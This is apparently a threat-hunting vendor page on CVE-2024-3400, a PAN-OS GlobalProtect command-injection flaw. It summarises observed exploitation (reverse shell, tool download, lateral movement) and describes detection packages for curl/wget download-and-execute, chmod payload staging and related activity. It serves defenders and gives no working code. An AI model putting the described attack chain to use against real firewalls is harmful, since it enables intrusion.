Threat Overview - CVE-2024-3400 - Palo Alto OS Command Injection Vulnerability
CVE-2024-3400 is a unauthenticated remote code execution vulnerability identified in devices utilizing GlobalProtect, and was identified by Volexity Threat Researchers on April of 2024. Reported to impact PAN-OS firewalls running versions 10.2, 11.0 and 11.1, this security flaw has been observed to be actively exploited (since March 26th) and considered critical in nature - Palo Alto Networks and Unit 42 labeling its exploitation as Operation MidnightEclipse. When exploited, it allows malicious actors to execute arbitrary code as a privileged user on the victim's firewall - with initial post exploitation being observed to include the utilization of a reverse shell, downloading of tools and subsequent lateral movement within the targeted environment.
Get your FREE Community Account today on the HUNTER Platform and get access to behavioral threat hunting content for your SIEM, EDR, NDR, and XDR platforms!
Hunt Packages
CURL/WGET Download and Execute - Potential Payload Download Followed by Execution
This Threat Hunt package identifies the use of curl or wget followed by the potential execution of the downloaded payload via a scripting interpreter, such as Bash, Python, Perl, or others.
Remote Interactive Connections from Unexpected Locations
This hunt package identifies remote interactive connections that originate unexpected locations that are exposed to the internet to more isolated internal locations, potentially indicating that external assets have been compromised and are being used as beachheads for lateral movement. By focusing on remote connection protocols such as SSH, WinRM, RDP, and SMB, this package is designed to detect unauthorized access and exploitation efforts where attackers leverage these protocols to move laterally across the network.
CURL/WGET Activity Associated with Time Zone Lookups
This Threat Hunt package identifies and analyzes the use of command-line tools like curl and wget by adversaries to gather time zone information on targets. By utilizing these common tools, adversaries can discreetly assess the physical location of their targets, including countries, cities, and sometimes even more precise locales. The package focuses on detecting unusual or suspicious uses of these utilities, which might indicate an attempt to access time zone services.
Usage of chmod to Enable Execution - Potential Payload Staging
This hunt package identifies instances where the 'chmod' command is used to modify file permissions, specifically focusing on changes that grant executable rights. By correlating these events with user contexts and known file paths, the package aims to highlight potentially malicious activities, such as the preparation of a system for exploitation or the setup of persistence mechanisms by unauthorized users.